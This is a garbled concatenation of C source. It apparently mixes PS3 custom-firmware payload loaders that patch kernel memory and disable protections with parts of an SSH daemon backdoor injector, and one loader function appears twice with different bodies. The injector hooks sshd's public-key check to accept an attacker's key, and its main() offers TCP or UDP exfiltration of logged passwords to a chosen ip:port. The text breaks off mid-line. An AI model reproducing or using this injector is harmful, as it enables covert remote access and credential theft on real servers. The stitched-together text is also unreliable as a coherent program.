void load_payload_341(int mode) { install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_groove_hermes_bin, payload_groove_hermes_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_341_bin, umount_341_bin_size); u64 data= 0x7C6903A64E800420ULL; lv2_memcpy(0x8000000000017CE0ULL, (u64) &data, 8); // copy the id u64 id= 0x534B314500000000ULL; lv2_memcpy(0x80000000000004f0ULL, (u64) &id, 8); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); usleep(250000); __asm__("sync"); lv2_call_payload(0x80000000007e0000ULL); usleep(250000); /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x2821FC, 0x386000007C6307B4); _poke32(0x282204, 0x4E800020); }
void load_payload_355dex(int mode) { install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_355dex_bin, payload_sky_355dex_bin_size); remove_lv2_memcpy(); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x059800, 0x60000000); PATCH_JUMP(0x059808, 0x598A0); _poke32(0x7EF60, 0x60000000); _poke32(0x7EF74, 0x60000000); _poke( 0x5978C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x59854, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" PATCH_JUMP(0x059858, 0x59764); /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x2909E8, 0x386000007C6307B4); _poke32(0x2909F0, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2C8AB8, (PAYLOAD_OFFSET+0xF0)); _poke((u32) (SYSCALL_BASE + 8 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x398)); // syscall_8_desc - sys8 _poke((u32) (SYSCALL_BASE + 36 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0xC8)); // syscall_map_open_desc - sys36 #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x2a8)); #endif }
void load_payload_syscall36old(int mode) { install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x80000000002be4a0ULL, (u64) payload_syscall36_355_bin, payload_syscall36_355_bin_size); remove_lv2_memcpy(); /* by 2 anonymous people */ _poke32(0x55f14, 0x60000000); _poke32(0x55f1c, 0x48000098); _poke32(0x7af68, 0x60000000); _poke32(0x7af7c, 0x60000000); _poke(0x55EA0, 0x63FF003D60000000); /* fix 8001003D error */ _poke(0x55F64, 0x3FE080013BE00000); /* fix 8001003E error */ _poke(0x2b3274, 0x4800B32C2BA30420); /* add a jump to payload2_start - hook */ _poke(0x346690, 0x80000000002be570); /* syscall_map_open_desc - sys36 */ }
static inline void remove_lv2_memcpy() { int n; for(n = 0; n < 50; n++) { pokeq(0x8000000000001820ULL, 0x0ULL); pokeq(0x8000000000001828ULL, 0x0ULL); pokeq(0x8000000000001830ULL, 0x0ULL); pokeq(0x8000000000001838ULL, 0x0ULL); pokeq(0x8000000000001840ULL, 0x0ULL); pokeq(0x8000000000001848ULL, 0x0ULL); pokeq(0x8000000000001850ULL, 0x0ULL); pokeq(0x8000000000001858ULL, 0x0ULL); pokeq(0x8000000000001860ULL, 0x0ULL); pokeq(0x8000000000001868ULL, 0x0ULL); pokeq(0x8000000000001870ULL, 0x0ULL); pokeq(0x8000000000001878ULL, 0x0ULL); _poke((u32) (SYSCALL_BASE + 9 * 8), restore_syscall); usleep(5000); } }
static inline void install_lv2_memcpy() { int n; restore_syscall = peekq(SYSCALL_BASE + (u64) (9 * 8)); for(n = 0; n < 50; n++) { pokeq(0x8000000000001820ULL, 0x8000000000001830ULL); pokeq(0x8000000000001828ULL, peekq(0x8000000000003000ULL)); pokeq(0x8000000000001830ULL, 0x282500004D820020ULL); pokeq(0x8000000000001838ULL, 0x38A5FFFF7CC428AEULL); pokeq(0x8000000000001840ULL, 0x7CC329AE7C0006ACULL); pokeq(0x8000000000001848ULL, 0x7CE32A1470E80003ULL); pokeq(0x8000000000001850ULL, 0x282500004082000CULL); pokeq(0x8000000000001858ULL, 0x7CE838504800000CULL); pokeq(0x8000000000001860ULL, 0x282800004082FFCCULL); pokeq(0x8000000000001868ULL, 0x7C0038AC7C0004ACULL); pokeq(0x8000000000001870ULL, 0x7C003FAC4C00012CULL); pokeq(0x8000000000001878ULL, 0x4BFFFFB800000000ULL); _poke((u32) (SYSCALL_BASE + 9 * 8), 0x8000000000001820ULL); usleep(5000); } }
void load_payload_355(int mode) { install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x800000000000ef48ULL, (u64) payload_sky_355_bin, payload_sky_355_bin_size); is_sky = 1; remove_lv2_memcpy(); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x55f14, 0x60000000); _poke32(0x55f1c, 0x48000098); _poke32(0x7af68, 0x60000000); _poke32(0x7af7c, 0x60000000); _poke(0x55EA0, 0x63FF003D60000000); // fix 8001003D error _poke(0x55F64, 0x3FE080013BE00000); // fix 8001003E error /* -002b3290 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d9 b4 11 |....|.#x|}.xK...| +002b3290 f8 01 00 b0 7c 9c 23 78 4b d5 bf 40 4b d9 b4 11 |....|.#xK..@K...| (openhook jump - 0xF1D8) */ _poke(0x2b3298, 0x4bd5bda04bd9b411ULL); //jump hook /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x28A404, 0x386000007C6307B4); _poke32(0x28A40C, 0x4E800020); /* 00346690 80 00 00 00 00 32 49 68 80 00 00 00 00 32 49 68 Ç....2IhÇ....2Ih */ _poke(0x346690, 0x800000000000F010ULL); // syscall_map_open_desc - sys36 _poke(0x3465b0, 0x800000000000F2E0ULL); // syscall_8_desc - sys8 #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x2a8)); #endif }
void load_payload_430dex(int mode) { //Remove lv2 memory protection ( only for cfw Rebug 4.30) if(peekq(0x8000000000001748ULL) == 0x4400002238600000ULL); // if lv1poke is present... { // Thanks cyberskunk! :) lv1poke(0x370AA8 + 0, 0x0000000000000001ULL); lv1poke(0x370AA8 + 8, 0xe0d251b556c59f05ULL); lv1poke(0x370AA8 + 16, 0xc232fcad552c80d7ULL); lv1poke(0x370AA8 + 24, 0x65140cd200000000ULL); } //fix for memcpy syscall on use pokeq(0x800000000037E048ULL,0x8000000000001500ULL); pokeq(0x8000000000001500ULL,0x8000000000001510ULL); install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_430dex_bin, payload_sky_430dex_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_430dex_bin, umount_430dex_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //Patches from webMAN pokeq(0x800000000029E034ULL, 0x4E80002038600000ULL ); pokeq(0x800000000029E03CULL, 0x7C6307B44E800020ULL ); // fix 8001003C error pokeq(0x800000000005AA88ULL, 0x63FF003D60000000ULL ); // fix 8001003D error pokeq(0x800000000005AB4CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error pokeq(0x800000000005AAF8ULL, 0x419E00D860000000ULL ); pokeq(0x800000000005AB00ULL, 0x2F84000448000098ULL ); pokeq(0x800000000005E4BCULL, 0x2F83000060000000ULL ); pokeq(0x800000000005E4D0ULL, 0x2F83000060000000ULL ); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x05AAFC, 0x60000000); PATCH_JUMP(0x05AB00, 0x5AB9C); _poke32(0x05E4C0, 0x60000000); // already set in E3 "nop" _poke32(0x05E4D4, 0x60000000); // already set in E3 "nop" _poke( 0x05AA88, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x05AB50, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" PATCH_JUMP(0x05AB54, 0x5AA60); // fix E3 4.30 added error /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x29E038, 0x386000007C6307B4); _poke32(0x29E038 + 8, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2DAE70, (PAYLOAD_OFFSET+0x30)); // patch openhook // _poke32(0x2DAE40, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_446dex(int mode) { //Remove Lv2 memory protection lv1poke(0x370AA8, 0x0000000000000001ULL); lv1poke(0x370AA8 + 8, 0xE0D251B556C59F05ULL); lv1poke(0x370AA8 + 16, 0xC232FCAD552C80D7ULL); lv1poke(0x370AA8 + 24, 0x65140CD200000000ULL); install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_446dex_bin, payload_sky_446dex_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_446dex_bin, umount_446dex_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x59A4C, 0x60000000); // done PATCH_JUMP(0x59A54, 0x59AEC); // done _poke32(0x5D410, 0x60000000); // done _poke32(0x5D424, 0x60000000); // done _poke( 0x599D8, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done _poke32(0x59AA0, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done // PATCH_JUMP(0x, 0x56098); /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x29D970, 0x386000007C6307B4); // is still patched in rebug, anyway.. _poke32(0x29D970 + 8, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2DBC80, (PAYLOAD_OFFSET+0x30)); // patch openhook // _poke32(0x2C4290, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") - is still present in Rogero 4.41? #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_355dex(int mode) { install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_355dex_bin, payload_sky_355dex_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_355dex_bin, umount_355dex_bin_size); restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount pokeq(0x80000000007EF220ULL, 0ULL); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x059800, 0x60000000); PATCH_JUMP(0x059808, 0x598A0); _poke32(0x7EF60, 0x60000000); _poke32(0x7EF74, 0x60000000); _poke( 0x5978C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x59854, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" PATCH_JUMP(0x059858, 0x59764); /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x2909E8, 0x386000007C6307B4); _poke32(0x2909F0, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2C8AB8, (PAYLOAD_OFFSET+0x30)); #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void backdoor_pubkey_install(inject_ctx *ctx, char *pubkey) { signature signatures[]={ { 0x1, "key_allowed", "trying public key file %s", 0 }, { 0x2, "restore_uid", "restore_uid: %u/%u" , 0 }, { 0x3, "key_new" , "key_new: RSA_new failed" , 0 }, { 0x4, "key_read" , "key_read: type mismatch: ", 0 }, { 0x5, "key_free" , "key_free: " , 0 }, }; u8 *evil_bin; int i; u32 callcache_total, num_key_allowed2_calls=0; char line[255]; callcache_entry *callcache, *entry; u64 user_key_allowed2_calls[MAX_KEY_ALLOWED_CALLS]; u64 diff=0, hole_addr=0, *import_table; evil_bin = malloc(hook_pubkey_bin_len); import_table = (u64*)(evil_bin + 8); memcpy(evil_bin, hook_pubkey_bin, hook_pubkey_bin_len); import_table[0] = ctx->config_addr; for(i = 0; i < sizeof(signatures) / sizeof(signature); i++) { if (ctx->uses_new_key_system == 0 || i < 2) { signatures[i].addr = sub_by_debugstr(ctx, signatures[i].str); } else { u64 f_dsa_new, f_bn_new, p_dsa_new, p_bn_new, callpair, callpair_b, p_rsa_free, p_dsa_free; switch(i) { case 2: // key_new f_dsa_new = resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_new" ); f_bn_new = resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_new" ); info("DSA_new@got = 0x%lx", f_dsa_new); info("BN_new@got = 0x%lx", f_bn_new); p_dsa_new = find_plt_entry(ctx, ctx->elf_base + f_dsa_new); p_bn_new = find_plt_entry(ctx, ctx->elf_base + f_bn_new); info("DSA_new@plt = 0x%lx", p_dsa_new); info("BN_new@plt = 0x%lx", p_bn_new); callpair = find_callpair(p_dsa_new, p_bn_new); info("yo we got a callpair for (DSA_new, BN_new) -> 0x%lx", callpair); signatures[i].addr = find_entrypoint(callpair); break; case 3: // key_read signatures[i].addr = prevcall_by_debugstr(ctx, "user_key_allowed: advance: "); break; case 4: // key_free p_rsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "RSA_free" )); p_dsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc( ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_free" )); info("RSA_free@plt = 0x%lx", p_rsa_free); info("DSA_free@plt = 0x%lx", p_dsa_free); callpair_b = find_callpair(p_rsa_free, p_dsa_free); if(callpair_b == 0) { callpair_b = find_callpair(p_dsa_free, p_rsa_free); } if(callpair_b != 0) { info("found callpair @ 0x%lx .. finding entrypoint..", callpair_b); signatures[i].addr = find_entrypoint_inner(callpair_b, 3); } else { error("could not find valid callpair to derive key_free()"); } break; default: error("WTF just happened!"); break; } } if (signatures[i].addr == 0) { error("%s not found :(\n", signatures[i].name); } sprintf(line, "%s\t\t= \x1b[37m0x%lx", signatures[i].name, signatures[i].addr - ctx->elf_base ); import_table[ signatures[i].import_id ] = signatures[i].addr; sprintf( line+strlen(line), " .. patched at offset 0x%lx in import table!", (signatures[i].import_id*8) & 0xffff ); info(line); } u64 f_BN_cmp = resolve_reloc(ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_cmp"); info("BN_cmp@got = 0x%lx", f_BN_cmp); u64 l_BN_cmp; _peek(ctx->pid, ctx->elf_base + f_BN_cmp, &l_BN_cmp, 8); info("BN_cmp@lib = 0x%lx", l_BN_cmp); import_table[6] = l_BN_cmp; callcache = get_callcache(); callcache_total = get_callcachetotal(); for(i=0; i<callcache_total; i++) { entry = &callcache[i]; if (entry->dest == signatures[0].addr && entry->type == CALLCACHE_TYPE_CALL) { info("found a 'call user_key_allowed' @ 0x%lx", entry->addr); user_key_allowed2_calls[num_key_allowed2_calls] = entry->addr; num_key_allowed2_calls++; } } if (num_key_allowed2_calls == 0) error("no call to user_key_allowed2 found :("); hole_addr = find_hole(ctx, user_key_allowed2_calls[0], 0x1000); if (hole_addr == 0) { error("unable to find neighborly hole."); } info("found usable hole @ 0x%lx", hole_addr); info2("entering critical phase"); _mmap( ctx, (void*)hole_addr, 0x1000, PROT_READ| PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, 0, 0 ); for(i=0; i<num_key_allowed2_calls; i++) { diff = 0x100000000-(user_key_allowed2_calls[i]-hole_addr)-5; info( "building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]", user_key_allowed2_calls[i], hole_addr, diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff ); _poke(ctx->pid, user_key_allowed2_calls[i]+1, &diff, 4); } _poke(ctx->pid, hole_addr, evil_bin, hook_pubkey_bin_len); for(i=0; i<hook_pubkey_bin_len; i++) { if (memcmp(evil_bin+i, "\xaa\xbb\xcc\xdd", 4) == 0) { info("inserting pubkey at offset %x in payload", i); _poke(ctx->pid, hole_addr+i, pubkey, strlen(pubkey)); } } info("poked evil_bin to 0x%lx.", hole_addr); }
void load_payload_470dex (int mode) { /* //Remove Lv2 memory protection, NOT needed for REBUG 4.70 lv1poke(0x370F28 + 0, 0x0000000000000001ULL); // Original: 0x0000000000351FD8ULL lv1poke(0x370F28 + 8, 0xE0D251B556C59F05ULL); // Original: 0x3B5B965B020AE21AULL lv1poke(0x370F28 + 16, 0xC232FCAD552C80D7ULL); // Original: 0x7D6F60B118E2E81BULL lv1poke(0x370F28 + 24, 0x65140CD200000000ULL); // Original: 0x315D8B7700000000ULL */ install_lv2_memcpy(); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_470dex_bin, payload_sky_470dex_bin_size); lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine (u64) umount_470dex_bin, umount_470dex_bin_size); restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (sc8*8) restore_syscall8[1]= peekq(restore_syscall8[0]); u64 id[2]; // copy the id id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET; id[1] = SYSCALL_BASE + 64ULL; // (sc8*8) lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16); u64 inst8 = peekq(0x8000000000003000ULL); // get TOC lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8); inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8 lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8); usleep(1000); remove_lv2_memcpy(); pokeq(0x80000000007EF000ULL, 0ULL);// BD Emu mount pokeq(0x80000000007EF220ULL, 0ULL); //patches by deank for webMAN, I left them here just in case someone wants to play with, but basically the same thing with SYS36 patches below /*pokeq(0x800000000026D7F4ULL, 0x4E80002038600000ULL ); // fix 8001003C error Original: 0x4E80002038600000ULL // 0x800000000029E528ULL?? pokeq(0x800000000026D7FCULL, 0x7C6307B44E800020ULL ); // fix 8001003C error Original: 0x7C6307B44E800020ULL // 0x800000000029E530ULL?? pokeq(0x8000000000059F58ULL, 0x63FF003D60000000ULL ); // fix 8001003D error Original: 0x63FF003D419EFFD4ULL pokeq(0x800000000005A01CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error Original: 0x3FE0800163FF003EULL pokeq(0x8000000000059FC8ULL, 0x419E00D860000000ULL ); // Original: 0x419E00D8419D00C0ULL pokeq(0x8000000000059FD0ULL, 0x2F84000448000098ULL ); // Original: 0x2F840004409C0048ULL //PATCH_JUMP pokeq(0x800000000005E0ACULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL pokeq(0x800000000005E0C0ULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL */ pokeq(0x8000000000059BFCULL, 0x386000012F830000ULL ); // Ignore LIC.DAT check <- DO NOT REMOVE pokeq(0x800000000022DAC8ULL, 0x38600000F8690000ULL ); // fix 0x8001002B / 80010017 errors (ported for DEX 4.70 2015-03-03) /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x59FCC, 0x60000000); PATCH_JUMP(0x59FD4, 0x5A06C); _poke32(0x5E0B0, 0x60000000); _poke32(0x5E0C4, 0x60000000); _poke( 0x59F58, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x5A020, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" //Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x26D7F8, 0x386000007C6307B4); // _poke32(0x26D7F8 + 8, 0x4E800020); // /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2B24A4, (PAYLOAD_OFFSET+0x30)); // patch openhook // _poke32(0x2B2480, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98") #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18)); #endif }
void load_payload_431(int mode) { // _poke((u32) (SYSCALL_BASE + 8 * 8) , 0x8000000000001788ULL); _poke((u32) (SYSCALL_BASE + 9 * 8) , 0x8000000000001790ULL); _poke((u32) (SYSCALL_BASE + 10 * 8), 0x8000000000001798ULL); install_lv2_memcpy(); /* install lv1 peek/poke/call */ lv2_memcpy(0x800000000000171C, (u64) lv1_peek_poke_call_routines, sizeof(lv1_peek_poke_call_routines)); /* WARNING!! It supports only payload with a size multiple of 8 */ lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_431_bin, payload_sky_431_bin_size); remove_lv2_memcpy(); /* BASIC PATCHES SYS36 */ // by 2 anonymous people _poke32(0x0571E8, 0x60000000); // already set in E3 "nop" PATCH_JUMP(0x0571F0, 0x57288); // already set in E3 _poke32(0x05ABAC, 0x60000000); // already set in E3 "nop" _poke32(0x05ABC0, 0x60000000); // already set in E3 "nop" // lv2poke(0x800000000005ABACULL,0x60000000E8610188ULL); different patch method // lv2poke(0x800000000005ABA0ULL,0x600000005463063EULL); _poke( 0x057174, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" _poke32(0x05723C, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" PATCH_JUMP(0x057240, 0x5714C); // fix E3 4.30 added error /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/ _poke(0x2979E4, 0x386000007C6307B4); _poke32(0x2979EC, 0x4E800020); /* -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...| +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...| (openhook jump - 0x3E80) */ PATCH_JUMP(0x2C3D04, (PAYLOAD_OFFSET+0xF0)); // patch openhook /* -0035dc20 80 00 00 00 00 33 bf 88 80 00 00 00 00 33 bf 88 |.....3.......3..| +0035dc20 80 00 00 00 00 00 41 28 80 00 00 00 00 33 bf 88 |......A(.....3..| -0035dd00 80 00 00 00 00 33 bf 88 80 00 00 00 00 33 bf 88 |.....3.......3..| +0035dd00 80 00 00 00 00 00 3e 58 80 00 00 00 00 33 bf 88 |......>X.....3..| */ _poke((u32) (SYSCALL_BASE + 8 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x398)); // syscall_8_desc - sys8 _poke((u32) (SYSCALL_BASE + 36 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0xC8)); // syscall_map_open_desc - sys36 #ifdef CONFIG_USE_SYS8PERMH4 PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x2a8)); #endif }
int main(int argc, char *argv[]) { config_block *config; char *pubkey_value = NULL; char *passlog_path = NULL; char *pubkey_file = NULL; int net_exfil_type = 0; int menu_activate = 0; int c; banner(); if (argc < 2) { usage(argv[0]); return -1; } config = malloc(sizeof(config_block)); memset(config, 0, sizeof(config_block)); while((c = getopt(argc-1, argv, "p:P:t:u:mc")) != -1) { switch(c) { case 'p': pubkey_value = optarg; break; case 'P': pubkey_file = optarg; break; case 't': if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port)) error("eh, '%s' is not a valid ip:port pair", optarg); config->net_type |= NET_EXFIL_TCP; break; case 'u': if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port)) error("eh, '%s' is not a valid ip:port pair", optarg); config->net_type |= NET_EXFIL_UDP; break; case 'c': config->only_log_valid = 1; break; case 'l': passlog_path = optarg; break; case 'm': menu_activate = 1; break; } } if (pubkey_file == NULL && pubkey_value == NULL && passlog_path == NULL && menu_activate == 0) { usage(argv[0]); return -1; } if (pubkey_value != NULL && pubkey_file != NULL) { usage(argv[0]); return -1; } if ((net_exfil_type & NET_EXFIL_TCP) && (net_exfil_type & NET_EXFIL_UDP)) { error("can only use one net exfiltration method."); return -1; } // allocate inject context inject_ctx *ctx = malloc(sizeof(inject_ctx)); // init inject context inject_ctx_init(ctx, atoi(argv[argc-1])); // find rexec_flag u64 rexec_flag = inject_resolve_rexec(ctx); info("rexec_flag\t\t\t= 0x%lx", rexec_flag); // install config memory block ctx->config_addr = 